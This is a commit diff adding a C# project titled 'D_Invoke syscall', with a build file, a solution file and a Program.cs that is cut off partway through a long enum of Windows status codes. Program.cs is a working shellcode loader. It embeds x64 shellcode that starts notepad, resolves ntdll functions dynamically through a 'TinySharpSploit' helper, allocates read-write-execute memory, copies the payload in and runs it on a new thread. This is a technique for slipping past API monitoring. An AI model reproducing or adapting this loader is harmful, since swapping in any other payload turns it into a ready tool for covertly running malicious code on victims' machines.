This commit is contained in:
commit
85feab0b9e
Binary file not shown.
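--- /dev/null
+++ b/D_Invoke syscall.csproj
@@ -0,0 +1,48 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
+<PropertyGroup>
+<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+<ProjectGuid>{E1059CA6-33B6-4B4C-9070-A09CD05B11B2}</ProjectGuid>
+<OutputType>Exe</OutputType>
+<RootNamespace>D_Invoke_syscall</RootNamespace>
+<AssemblyName>D_Invoke syscall</AssemblyName>
+<TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
+<FileAlignment>512</FileAlignment>
+<Deterministic>true</Deterministic>
+</PropertyGroup>
+<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+<PlatformTarget>AnyCPU</PlatformTarget>
+<DebugSymbols>true</DebugSymbols>
+<DebugType>full</DebugType>
+<Optimize>false</Optimize>
+<OutputPath>bin\Debug\</OutputPath>
+<DefineConstants>DEBUG;TRACE</DefineConstants>
+<ErrorReport>prompt</ErrorReport>
+<WarningLevel>4</WarningLevel>
+</PropertyGroup>
+<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+<PlatformTarget>AnyCPU</PlatformTarget>
+<DebugType>pdbonly</DebugType>
+<Optimize>true</Optimize>
+<OutputPath>bin\Release\</OutputPath>
+<DefineConstants>TRACE</DefineConstants>
+<ErrorReport>prompt</ErrorReport>
+<WarningLevel>4</WarningLevel>
+</PropertyGroup>
+<ItemGroup>
+<Reference Include="System" />
+<Reference Include="System.Core" />
+<Reference Include="System.Xml.Linq" />
+<Reference Include="System.Data.DataSetExtensions" />
+<Reference Include="Microsoft.CSharp" />
+<Reference Include="System.Data" />
+<Reference Include="System.Xml" />
+</ItemGroup>
+<ItemGroup>
+<Compile Include="Program.cs" />
+<Compile Include="Properties\AssemblyInfo.cs" />
+</ItemGroup>
+<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
+</Project>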
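--- /dev/null
+++ b/PLACEHOLDER_SOLUTION_FILE.sln
@@ -0,0 +1,25 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.29926.136
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "D_Invoke syscall", "D_Invoke syscall.csproj", "{E1059CA6-33B6-4B4C-9070-A09CD05B11B2}"
+EndProject
+Global
+GlobalSection(SolutionConfigurationPlatforms) = preSolution
+Debug|Any CPU = Debug|Any CPU
+Release|Any CPU = Release|Any CPU
+EndGlobalSection
+GlobalSection(ProjectConfigurationPlatforms) = postSolution
+{E1059CA6-33B6-4B4C-9070-A09CD05B11B2}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+{E1059CA6-33B6-4B4C-9070-A09CD05B11B2}.Debug|Any CPU.Build.0 = Debug|Any CPU
+{E1059CA6-33B6-4B4C-9070-A09CD05B11B2}.Release|Any CPU.ActiveCfg = Release|Any CPU
+{E1059CA6-33B6-4B4C-9070-A09CD05B11B2}.Release|Any CPU.Build.0 = Release|Any CPU
+EndGlobalSection
+GlobalSection(SolutionProperties) = preSolution
+HideSolutionNode = FALSE
+EndGlobalSection
+GlobalSection(ExtensibilityGlobals) = postSolution
+SolutionGuid = {B4629ECC-1B52-459C-B9AF-0A7904437F69}
+EndGlobalSection
+EndGlobal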
@ -0,0 +1,828 @@
|
|||
using System;
|
||||
using System.ComponentModel;
|
||||
using System.Diagnostics;
|
||||
using System.IO;
|
||||
using System.Runtime.InteropServices;
|
||||
|
||||
namespace D_Invoke_syscall
|
||||
{
|
||||
class Program
|
||||
{
|
||||
static void Main(string[] args)
|
||||
{
|
||||
byte[] notepadShellcode_x64 = new byte[] {
|
||||
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
|
||||
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
|
||||
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
|
||||
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
|
||||
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
|
||||
0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
|
||||
0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,
|
||||
0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,
|
||||
0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,
|
||||
0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
|
||||
0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,
|
||||
0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
|
||||
0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,
|
||||
0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
|
||||
0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,
|
||||
0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
|
||||
0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,
|
||||
0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x43,0x3a,0x5c,
|
||||
0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x5c,0x53,0x79,0x73,0x74,0x65,0x6d,0x33,
|
||||
0x32,0x5c,0x6e,0x6f,0x74,0x65,0x70,0x61,0x64,0x2e,0x65,0x78,0x65,0x00 };
|
||||
Native.NTSTATUS success;
|
||||
|
||||
IntPtr hProcess = Native.GetCurrentProcess(); // 进程句柄,当前进程为-1
|
||||
IntPtr BaseAddress = IntPtr.Zero; // 接收分配的内存地址
|
||||
IntPtr ZeroBits = IntPtr.Zero;
|
||||
UIntPtr RegionSize = new UIntPtr(Convert.ToUInt32(notepadShellcode_x64.Length)); // 申请的内存大小
|
||||
uint AllocationType = (uint)Native.AllocationType.Commit | (uint)Native.AllocationType.Reserve; // 分配类型
|
||||
uint Protect = (uint)Native.AllocationProtect.PAGE_EXECUTE_READWRITE; // 内存权限:读写执行
|
||||
|
||||
IntPtr pointer = TinySharpSploit.GetLibraryAddress("ntdll.dll", "NtAllocateVirtualMemory");
|
||||
Delegates.NtAllocateVirtualMemory NtAllocateVirtualMemory = Marshal.GetDelegateForFunctionPointer(pointer, typeof(Delegates.NtAllocateVirtualMemory)) as Delegates.NtAllocateVirtualMemory;
|
||||
success = NtAllocateVirtualMemory(hProcess, ref BaseAddress, ZeroBits, ref RegionSize, AllocationType, Protect);
|
||||
Console.WriteLine($"NtAllocateVirtualMemory -> {success}");
|
||||
Console.WriteLine($"申请的内存地址 -> 0x{BaseAddress.ToString("X")}");
|
||||
|
||||
|
||||
// 把notepadShellcode复制到申请的BaseAddress内存
|
||||
Marshal.Copy(notepadShellcode_x64, 0, BaseAddress, notepadShellcode_x64.Length);
|
||||
|
||||
|
||||
IntPtr hThread = IntPtr.Zero; // 接收线程句柄
|
||||
Native.ACCESS_MASK DesiredAccess = Native.ACCESS_MASK.SPECIFIC_RIGHTS_ALL | Native.ACCESS_MASK.STANDARD_RIGHTS_ALL; // 访问权限
|
||||
IntPtr ObjectAttributes = IntPtr.Zero;
|
||||
IntPtr lpParameter = IntPtr.Zero;
|
||||
bool CreateSuspended = false; // 是否挂起
|
||||
uint StackZeroBits = 0;
|
||||
uint SizeOfStackCommit = 0xFFFF; // 65535
|
||||
uint SizeOfStackReserve = 0xFFFF; // 65535
|
||||
IntPtr lpBytesBuffer = IntPtr.Zero;
|
||||
|
||||
pointer = TinySharpSploit.GetLibraryAddress("ntdll.dll", "NtCreateThreadEx");
|
||||
Delegates.NtCreateThreadEx NtCreateThreadEx = Marshal.GetDelegateForFunctionPointer(pointer, typeof(Delegates.NtCreateThreadEx)) as Delegates.NtCreateThreadEx;
|
||||
success = NtCreateThreadEx(out hThread, DesiredAccess, ObjectAttributes, hProcess, BaseAddress, lpParameter, CreateSuspended, StackZeroBits, SizeOfStackCommit, SizeOfStackReserve, lpBytesBuffer);
|
||||
Console.WriteLine($"NtCreateThreadEx -> {success}\nThread Id -> {Native.GetThreadId(hThread)}");
|
||||
|
||||
|
||||
Console.WriteLine(new Win32Exception());
|
||||
|
||||
|
||||
pointer = TinySharpSploit.GetLibraryAddress("ntdll.dll", "NtWaitForSingleObject");
|
||||
Delegates.NtWaitForSingleObject NtWaitForSingleObject = Marshal.GetDelegateForFunctionPointer(pointer, typeof(Delegates.NtWaitForSingleObject)) as Delegates.NtWaitForSingleObject;
|
||||
success = NtWaitForSingleObject(hThread, false, 0);
|
||||
Console.WriteLine($"NtWaitForSingleObject -> {success}");
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
class Delegates
|
||||
{
|
||||
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
|
||||
public delegate Native.NTSTATUS NtCreateThreadEx(
|
||||
out IntPtr hThread,
|
||||
Native.ACCESS_MASK DesiredAccess,
|
||||
IntPtr ObjectAttributes,
|
||||
IntPtr ProcessHandle,
|
||||
IntPtr lpStartAddress,
|
||||
IntPtr lpParameter,
|
||||
bool CreateSuspended,
|
||||
uint StackZeroBits,
|
||||
uint SizeOfStackCommit,
|
||||
uint SizeOfStackReserve,
|
||||
IntPtr lpBytesBuffer
|
||||
);
|
||||
|
||||
// https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-ntallocatevirtualmemory
|
||||
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
|
||||
public delegate Native.NTSTATUS NtAllocateVirtualMemory(
|
||||
IntPtr ProcessHandle,
|
||||
ref IntPtr BaseAddress,
|
||||
IntPtr ZeroBits,
|
||||
ref UIntPtr RegionSize,
|
||||
ulong AllocationType,
|
||||
ulong Protect
|
||||
);
|
||||
|
||||
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
|
||||
public delegate Native.NTSTATUS NtWaitForSingleObject(
|
||||
IntPtr Object,
|
||||
bool Alertable,
|
||||
uint Timeout
|
||||
);
|
||||
|
||||
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
|
||||
public delegate void RtlInitUnicodeString(ref Native.UNICODE_STRING DestinationString, [MarshalAs(UnmanagedType.LPWStr)] string SourceString);
|
||||
}
|
||||
|
||||
public class Native
|
||||
{
|
||||
// https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/596a1078-e883-4972-9bbc-49e60bebca55
|
||||
public enum NTSTATUS : uint
|
||||
{
|
||||
// Success
|
||||
Success = 0x00000000,
|
||||
// Wait0 = 0x00000000,
|
||||
Wait1 = 0x00000001,
|
||||
Wait2 = 0x00000002,
|
||||
Wait3 = 0x00000003,
|
||||
Wait63 = 0x0000003f,
|
||||
Abandoned = 0x00000080,
|
||||
AbandonedWait0 = 0x00000080,
|
||||
AbandonedWait1 = 0x00000081,
|
||||
AbandonedWait2 = 0x00000082,
|
||||
AbandonedWait3 = 0x00000083,
|
||||
AbandonedWait63 = 0x000000bf,
|
||||
UserApc = 0x000000c0,
|
||||
KernelApc = 0x00000100,
|
||||
Alerted = 0x00000101,
|
||||
Timeout = 0x00000102,
|
||||
Pending = 0x00000103,
|
||||
Reparse = 0x00000104,
|
||||
MoreEntries = 0x00000105,
|
||||
NotAllAssigned = 0x00000106,
|
||||
SomeNotMapped = 0x00000107,
|
||||
OpLockBreakInProgress = 0x00000108,
|
||||
VolumeMounted = 0x00000109,
|
||||
RxActCommitted = 0x0000010a,
|
||||
NotifyCleanup = 0x0000010b,
|
||||
NotifyEnumDir = 0x0000010c,
|
||||
NoQuotasForAccount = 0x0000010d,
|
||||
PrimaryTransportConnectFailed = 0x0000010e,
|
||||
PageFaultTransition = 0x00000110,
|
||||
PageFaultDemandZero = 0x00000111,
|
||||
PageFaultCopyOnWrite = 0x00000112,
|
||||
PageFaultGuardPage = 0x00000113,
|
||||
PageFaultPagingFile = 0x00000114,
|
||||
CrashDump = 0x00000116,
|
||||
ReparseObject = 0x00000118,
|
||||
NothingToTerminate = 0x00000122,
|
||||
ProcessNotInJob = 0x00000123,
|
||||
ProcessInJob = 0x00000124,
|
||||
ProcessCloned = 0x00000129,
|
||||
FileLockedWithOnlyReaders = 0x0000012a,
|
||||
FileLockedWithWriters = 0x0000012b,
|
||||
|
||||
// Informational
|
||||
Informational = 0x40000000,
|
||||
ObjectNameExists = 0x40000000,
|
||||
ThreadWasSuspended = 0x40000001,
|
||||
WorkingSetLimitRange = 0x40000002,
|
||||
ImageNotAtBase = 0x40000003,
|
||||
RegistryRecovered = 0x40000009,
|
||||
|
||||
// Warning
|
||||
Warning = 0x80000000,
|
||||
GuardPageViolation = 0x80000001,
|
||||
DatatypeMisalignment = 0x80000002,
|
||||
Breakpoint = 0x80000003,
|
||||
SingleStep = 0x80000004,
|
||||
BufferOverflow = 0x80000005,
|
||||
NoMoreFiles = 0x80000006,
|
||||
HandlesClosed = 0x8000000a,
|
||||
PartialCopy = 0x8000000d,
|
||||
DeviceBusy = 0x80000011,
|
||||
InvalidEaName = 0x80000013,
|
||||
EaListInconsistent = 0x80000014,
|
||||
NoMoreEntries = 0x8000001a,
|
||||
LongJump = 0x80000026,
|
||||
DllMightBeInsecure = 0x8000002b,
|
||||
|
||||
// Error
|
||||
Error = 0xc0000000,
|
||||
Unsuccessful = 0xc0000001,
|
||||
NotImplemented = 0xc0000002,
|
||||
InvalidInfoClass = 0xc0000003,
|
||||
InfoLengthMismatch = 0xc0000004,
|
||||
AccessViolation = 0xc0000005,
|
||||
InPageError = 0xc0000006,
|
||||
PagefileQuota = 0xc0000007,
|
||||
InvalidHandle = 0xc0000008,
|
||||
BadInitialStack = 0xc0000009,
|
||||
BadInitialPc = 0xc000000a,
|
||||
InvalidCid = 0xc000000b,
|
||||
TimerNotCanceled = 0xc000000c,
|
||||
InvalidParameter = 0xc000000d,
|
||||
NoSuchDevice = 0xc000000e,
|
||||
NoSuchFile = 0xc000000f,
|
||||
InvalidDeviceRequest = 0xc0000010,
|
||||
EndOfFile = 0xc0000011,
|
||||
WrongVolume = 0xc0000012,
|
||||
NoMediaInDevice = 0xc0000013,
|
||||
NoMemory = 0xc0000017,
|
||||
NotMappedView = 0xc0000019,
|
||||
UnableToFreeVm = 0xc000001a,
|
||||
UnableToDeleteSection = 0xc000001b,
|
||||
IllegalInstruction = 0xc000001d,
|
||||
AlreadyCommitted = 0xc0000021,
|
||||
AccessDenied = 0xc0000022,
|
||||
BufferTooSmall = 0xc0000023,
|
||||
ObjectTypeMismatch = 0xc0000024,
|
||||
NonContinuableException = 0xc0000025,
|
||||
BadStack = 0xc0000028,
|
||||
NotLocked = 0xc000002a,
|
||||
NotCommitted = 0xc000002d,
|
||||
InvalidParameterMix = 0xc0000030,
|
||||
ObjectNameInvalid = 0xc0000033,
|
||||
ObjectNameNotFound = 0xc0000034,
|
||||
ObjectNameCollision = 0xc0000035,
|
||||
ObjectPathInvalid = 0xc0000039,
|
||||
ObjectPathNotFound = 0xc000003a,
|
||||
ObjectPathSyntaxBad = 0xc000003b,
|
||||
DataOverrun = 0xc000003c,
|
||||
DataLate = 0xc000003d,
|
||||
DataError = 0xc000003e,
|
||||
CrcError = 0xc000003f,
|
||||
SectionTooBig = 0xc0000040,
|
||||
PortConnectionRefused = 0xc0000041,
|
||||
InvalidPortHandle = 0xc0000042,
|
||||
SharingViolation = 0xc0000043,
|
||||
QuotaExceeded = 0xc0000044,
|
||||
InvalidPageProtection = 0xc0000045,
|
||||
MutantNotOwned = 0xc0000046,
|
||||
SemaphoreLimitExceeded = 0xc0000047,
|
||||
PortAlreadySet = 0xc0000048,
|
||||
SectionNotImage = 0xc0000049,
|
||||
SuspendCountExceeded = 0xc000004a,
|
||||
ThreadIsTerminating = 0xc000004b,
|
||||
BadWorkingSetLimit = 0xc000004c,
|
||||
IncompatibleFileMap = 0xc000004d,
|
||||
SectionProtection = 0xc000004e,
|
||||
EasNotSupported = 0xc000004f,
|
||||
EaTooLarge = 0xc0000050,
|
||||
NonExistentEaEntry = 0xc0000051,
|
||||
NoEasOnFile = 0xc0000052,
|
||||
EaCorruptError = 0xc0000053,
|
||||
FileLockConflict = 0xc0000054,
|
||||
LockNotGranted = 0xc0000055,
|
||||
DeletePending = 0xc0000056,
|
||||
CtlFileNotSupported = 0xc0000057,
|
||||
UnknownRevision = 0xc0000058,
|
||||
RevisionMismatch = 0xc0000059,
|
||||
InvalidOwner = 0xc000005a,
|
||||
InvalidPrimaryGroup = 0xc000005b,
|
||||
NoImpersonationToken = 0xc000005c,
|
||||
CantDisableMandatory = 0xc000005d,
|
||||
NoLogonServers = 0xc000005e,
|
||||
NoSuchLogonSession = 0xc000005f,
|
||||
NoSuchPrivilege = 0xc0000060,
|
||||
PrivilegeNotHeld = 0xc0000061,
|
||||
InvalidAccountName = 0xc0000062,
|
||||
UserExists = 0xc0000063,
|
||||
NoSuchUser = 0xc0000064,
|
||||
GroupExists = 0xc0000065,
|
||||
NoSuchGroup = 0xc0000066,
|
||||
MemberInGroup = 0xc0000067,
|
||||
MemberNotInGroup = 0xc0000068,
|
||||
LastAdmin = 0xc0000069,
|
||||
WrongPassword = 0xc000006a,
|
||||
IllFormedPassword = 0xc000006b,
|
||||
PasswordRestriction = 0xc000006c,
|
||||
LogonFailure = 0xc000006d,
|
||||
AccountRestriction = 0xc000006e,
|
||||
InvalidLogonHours = 0xc000006f,
|
||||
InvalidWorkstation = 0xc0000070,
|
||||
PasswordExpired = 0xc0000071,
|
||||
AccountDisabled = 0xc0000072,
|
||||
NoneMapped = 0xc0000073,
|
||||
TooManyLuidsRequested = 0xc0000074,
|
||||
LuidsExhausted = 0xc0000075,
|
||||
InvalidSubAuthority = 0xc0000076,
|
||||
InvalidAcl = 0xc0000077,
|
||||
InvalidSid = 0xc0000078,
|
||||
InvalidSecurityDescr = 0xc0000079,
|
||||
ProcedureNotFound = 0xc000007a,
|
||||
InvalidImageFormat = 0xc000007b,
|
||||
NoToken = 0xc000007c,
|
||||
BadInheritanceAcl = 0xc000007d,
|
||||
RangeNotLocked = 0xc000007e,
|
||||
DiskFull = 0xc000007f,
|
||||
ServerDisabled = 0xc0000080,
|
||||
ServerNotDisabled = 0xc0000081,
|
||||
TooManyGuidsRequested = 0xc0000082,
|
||||
GuidsExhausted = 0xc0000083,
|
||||
InvalidIdAuthority = 0xc0000084,
|
||||
AgentsExhausted = 0xc0000085,
|
||||
InvalidVolumeLabel = 0xc0000086,
|
||||
SectionNotExtended = 0xc0000087,
|
||||
NotMappedData = 0xc0000088,
|
||||
ResourceDataNotFound = 0xc0000089,
|
||||
ResourceTypeNotFound = 0xc000008a,
|
||||
ResourceNameNotFound = 0xc000008b,
|
||||
ArrayBoundsExceeded = 0xc000008c,
|
||||
FloatDenormalOperand = 0xc000008d,
|
||||
FloatDivideByZero = 0xc000008e,
|
||||
FloatInexactResult = 0xc000008f,
|
||||
FloatInvalidOperation = 0xc0000090,
|
||||
FloatOverflow = 0xc0000091,
|
||||
FloatStackCheck = 0xc0000092,
|
||||
FloatUnderflow = 0xc0000093,
|
||||
IntegerDivideByZero = 0xc0000094,
|
||||
IntegerOverflow = 0xc0000095,
|
||||
PrivilegedInstruction = 0xc0000096,
|
||||
TooManyPagingFiles = 0xc0000097,
|
||||
FileInvalid = 0xc0000098,
|
||||
InstanceNotAvailable = 0xc00000ab,
|
||||
PipeNotAvailable = 0xc00000ac,
|
||||
InvalidPipeState = 0xc00000ad,
|
||||
PipeBusy = 0xc00000ae,
|
||||
IllegalFunction = 0xc00000af,
|
||||
PipeDisconnected = 0xc00000b0,
|
||||
PipeClosing = 0xc00000b1,
|
||||
PipeConnected = 0xc00000b2,
|
||||
PipeListening = 0xc00000b3,
|
||||
InvalidReadMode = 0xc00000b4,
|
||||
IoTimeout = 0xc00000b5,
|
||||
FileForcedClosed = 0xc00000b6,
|
||||
ProfilingNotStarted = 0xc00000b7,
|
||||
ProfilingNotStopped = 0xc00000b8,
|
||||
NotSameDevice = 0xc00000d4,
|
||||
FileRenamed = 0xc00000d5,
|
||||
CantWait = 0xc00000d8,
|
||||
PipeEmpty = 0xc00000d9,
|
||||
CantTerminateSelf = 0xc00000db,
|
||||
InternalError = 0xc00000e5,
|
||||
InvalidParameter1 = 0xc00000ef,
|
||||
InvalidParameter2 = 0xc00000f0,
|
||||
InvalidParameter3 = 0xc00000f1,
|
||||
InvalidParameter4 = 0xc00000f2,
|
||||
InvalidParameter5 = 0xc00000f3,
|
||||
InvalidParameter6 = 0xc00000f4,
|
||||
InvalidParameter7 = 0xc00000f5,
|
||||
InvalidParameter8 = 0xc00000f6,
|
||||
InvalidParameter9 = 0xc00000f7,
|
||||
InvalidParameter10 = 0xc00000f8,
|
||||
InvalidParameter11 = 0xc00000f9,
|
||||
InvalidParameter12 = 0xc00000fa,
|
||||
MappedFileSizeZero = 0xc000011e,
|
||||
TooManyOpenedFiles = 0xc000011f,
|
||||
Cancelled = 0xc0000120,
|
||||
CannotDelete = 0xc0000121,
|
||||
InvalidComputerName = 0xc0000122,
|
||||
FileDeleted = 0xc0000123,
|
||||
SpecialAccount = 0xc0000124,
|
||||
SpecialGroup = 0xc0000125,
|
||||
SpecialUser = 0xc0000126,
|
||||
MembersPrimaryGroup = 0xc0000127,
|
||||
FileClosed = 0xc0000128,
|
||||
TooManyThreads = 0xc0000129,
|
||||
ThreadNotInProcess = 0xc000012a,
|
||||
TokenAlreadyInUse = 0xc000012b,
|
||||
PagefileQuotaExceeded = 0xc000012c,
|
||||
CommitmentLimit = 0xc000012d,
|
||||
InvalidImageLeFormat = 0xc000012e,
|
||||
InvalidImageNotMz = 0xc000012f,
|
||||
InvalidImageProtect = 0xc0000130,
|
||||
InvalidImageWin16 = 0xc0000131,
|
||||
LogonServer = 0xc0000132,
|
||||
DifferenceAtDc = 0xc0000133,
|
||||
SynchronizationRequired = 0xc0000134,
|
||||
DllNotFound = 0xc0000135,
|
||||
IoPrivilegeFailed = 0xc0000137,
|
||||
OrdinalNotFound = 0xc0000138,
|
||||
EntryPointNotFound = 0xc0000139,
|
||||
ControlCExit = 0xc000013a,
|
||||
PortNotSet = 0xc0000353,
|
||||
DebuggerInactive = 0xc0000354,
|
||||
CallbackBypass = 0xc0000503,
|
||||
PortClosed = 0xc0000700,
|
||||
MessageLost = 0xc0000701,
|
||||
InvalidMessage = 0xc0000702,
|
||||
RequestCanceled = 0xc0000703,
|
||||
RecursiveDispatch = 0xc0000704,
|
||||
LpcReceiveBufferExpected = 0xc0000705,
|
||||
LpcInvalidConnectionUsage = 0xc0000706,
|
||||
LpcRequestsNotAllowed = 0xc0000707,
|
||||
ResourceInUse = 0xc0000708,
|
||||
ProcessIsProtected = 0xc0000712,
|
||||
VolumeDirty = 0xc0000806,
|
||||
FileCheckedOut = 0xc0000901,
|
||||
CheckOutRequired = 0xc0000902,
|
||||
BadFileType = 0xc0000903,
|
||||
FileTooLarge = 0xc0000904,
|
||||
FormsAuthRequired = 0xc0000905,
|
||||
VirusInfected = 0xc0000906,
|
||||
VirusDeleted = 0xc0000907,
|
||||
TransactionalConflict = 0xc0190001,
|
||||
InvalidTransaction = 0xc0190002,
|
||||
TransactionNotActive = 0xc0190003,
|
||||
TmInitializationFailed = 0xc0190004,
|
||||
RmNotActive = 0xc0190005,
|
||||
RmMetadataCorrupt = 0xc0190006,
|
||||
TransactionNotJoined = 0xc0190007,
|
||||
DirectoryNotRm = 0xc0190008,
|
||||
CouldNotResizeLog = 0xc0190009,
|
||||
TransactionsUnsupportedRemote = 0xc019000a,
|
||||
LogResizeInvalidSize = 0xc019000b,
|
||||
RemoteFileVersionMismatch = 0xc019000c,
|
||||
CrmProtocolAlreadyExists = 0xc019000f,
|
||||
TransactionPropagationFailed = 0xc0190010,
|
||||
CrmProtocolNotFound = 0xc0190011,
|
||||
TransactionSuperiorExists = 0xc0190012,
|
||||
TransactionRequestNotValid = 0xc0190013,
|
||||
TransactionNotRequested = 0xc0190014,
|
||||
TransactionAlreadyAborted = 0xc0190015,
|
||||
TransactionAlreadyCommitted = 0xc0190016,
|
||||
TransactionInvalidMarshallBuffer = 0xc0190017,
|
||||
CurrentTransactionNotValid = 0xc0190018,
|
||||
LogGrowthFailed = 0xc0190019,
|
||||
ObjectNoLongerExists = 0xc0190021,
|
||||
StreamMiniversionNotFound = 0xc0190022,
|
||||
StreamMiniversionNotValid = 0xc0190023,
|
||||
MiniversionInaccessibleFromSpecifiedTransaction = 0xc0190024,
|
||||
CantOpenMiniversionWithModifyIntent = 0xc0190025,
|
||||
CantCreateMoreStreamMiniversions = 0xc0190026,
|
||||
HandleNoLongerValid = 0xc0190028,
|
||||
NoTxfMetadata = 0xc0190029,
|
||||
LogCorruptionDetected = 0xc0190030,
|
||||
CantRecoverWithHandleOpen = 0xc0190031,
|
||||
RmDisconnected = 0xc0190032,
|
||||
EnlistmentNotSuperior = 0xc0190033,
|
||||
RecoveryNotNeeded = 0xc0190034,
|
||||
RmAlreadyStarted = 0xc0190035,
|
||||
FileIdentityNotPersistent = 0xc0190036,
|
||||
CantBreakTransactionalDependency = 0xc0190037,
|
||||
CantCrossRmBoundary = 0xc0190038,
|
||||
TxfDirNotEmpty = 0xc0190039,
|
||||
IndoubtTransactionsExist = 0xc019003a,
|
||||
TmVolatile = 0xc019003b,
|
||||
RollbackTimerExpired = 0xc019003c,
|
||||
TxfAttributeCorrupt = 0xc019003d,
|
||||
EfsNotAllowedInTransaction = 0xc019003e,
|
||||
TransactionalOpenNotAllowed = 0xc019003f,
|
||||
TransactedMappingUnsupportedRemote = 0xc0190040,
|
||||
TxfMetadataAlreadyPresent = 0xc0190041,
|
||||
TransactionScopeCallbacksNotSet = 0xc0190042,
|
||||
TransactionRequiredPromotion = 0xc0190043,
|
||||
CannotExecuteFileInTransaction = 0xc0190044,
|
||||
TransactionsNotFrozen = 0xc0190045,
|
||||
MaximumNtStatus = 0xffffffff
|
||||
}
|
||||
|
||||
// http://www.pinvoke.net/default.aspx/kernel32/VirtualAlloc.html
|
||||
// NtAllocateVirtualMemory - ULONG AllocationType
|
||||
[Flags]
|
||||
public enum AllocationType : ulong
|
||||
{
|
||||
Commit = 0x1000,
|
||||
Reserve = 0x2000,
|
||||
Decommit = 0x4000,
|
||||
Release = 0x8000,
|
||||
Reset = 0x80000,
|
||||
Physical = 0x400000,
|
||||
TopDown = 0x100000,
|
||||
WriteWatch = 0x200000,
|
||||
LargePages = 0x20000000
|
||||
}
|
||||
|
||||
// http://www.pinvoke.net/default.aspx/Enums/ACCESS_MASK.html
|
||||
// NtCreateThread - ACCESS_MASK DesiredAccess
|
||||
[Flags]
|
||||
public enum ACCESS_MASK : uint
|
||||
{
|
||||
DELETE = 0x00010000,
|
||||
READ_CONTROL = 0x00020000,
|
||||
WRITE_DAC = 0x00040000,
|
||||
WRITE_OWNER = 0x00080000,
|
||||
SYNCHRONIZE = 0x00100000,
|
||||
STANDARD_RIGHTS_REQUIRED = 0x000F0000,
|
||||
STANDARD_RIGHTS_READ = 0x00020000,
|
||||
STANDARD_RIGHTS_WRITE = 0x00020000,
|
||||
STANDARD_RIGHTS_EXECUTE = 0x00020000,
|
||||
STANDARD_RIGHTS_ALL = 0x001F0000,
|
||||
SPECIFIC_RIGHTS_ALL = 0x0000FFFF,
|
||||
ACCESS_SYSTEM_SECURITY = 0x01000000,
|
||||
MAXIMUM_ALLOWED = 0x02000000,
|
||||
GENERIC_READ = 0x80000000,
|
||||
GENERIC_WRITE = 0x40000000,
|
||||
GENERIC_EXECUTE = 0x20000000,
|
||||
GENERIC_ALL = 0x10000000,
|
||||
DESKTOP_READOBJECTS = 0x00000001,
|
||||
DESKTOP_CREATEWINDOW = 0x00000002,
|
||||
DESKTOP_CREATEMENU = 0x00000004,
|
||||
DESKTOP_HOOKCONTROL = 0x00000008,
|
||||
DESKTOP_JOURNALRECORD = 0x00000010,
|
||||
DESKTOP_JOURNALPLAYBACK = 0x00000020,
|
||||
DESKTOP_ENUMERATE = 0x00000040,
|
||||
DESKTOP_WRITEOBJECTS = 0x00000080,
|
||||
DESKTOP_SWITCHDESKTOP = 0x00000100,
|
||||
WINSTA_ENUMDESKTOPS = 0x00000001,
|
||||
